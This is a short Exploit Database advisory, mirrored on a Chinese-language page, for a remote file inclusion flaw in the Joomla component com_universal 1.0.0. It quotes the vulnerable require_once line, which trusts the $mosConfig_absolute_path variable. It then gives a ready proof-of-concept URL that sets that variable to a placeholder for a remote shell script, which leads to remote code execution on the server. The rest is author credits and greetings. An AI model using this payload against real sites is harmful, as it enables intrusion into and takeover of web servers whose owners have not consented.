Joomla! Component com_universal – Remote File Inclusion

• Exploit Database
• 122 阅读

• 作者： eidelweiss
  日期： 2010-03-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11865/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  ########################################################### Joomla component com_universal <= Remote File Inclusion Vulnerability exploit ###########################################################   [+]Software: Joomla component com_universal (UWCMS Universal Web CMS) [+]Version: 1.0.0 [+]License: http://www.gnu.org/copyleft/gpl.html GNU/GPL [+]Source: http://uwcms.sourceforge.net [+]CWE ID : 98 [+]Security Risk: High [+]Remote Exploit: Yes   ########################################################### [+]Author: eidelweiss [+]Contact: eidelweiss[at]cyberservices[dot]com [+]Thank`s: sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) [+]Special: [D]eal [C]yber - syabilla_putri (miss u) , psychotic_girl (dodol :P) , all my friends ###########################################################   -=[ VULN ]=-   [-] /includes/config/config.html.php   global $mosConfig_absolute_path; require_once($mosConfig_absolute_path."/administrator/components/com_universal/includes/config/configuracion.php");   -=[ P0C ]=-   http://127.0.0.1//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]   ###########################################################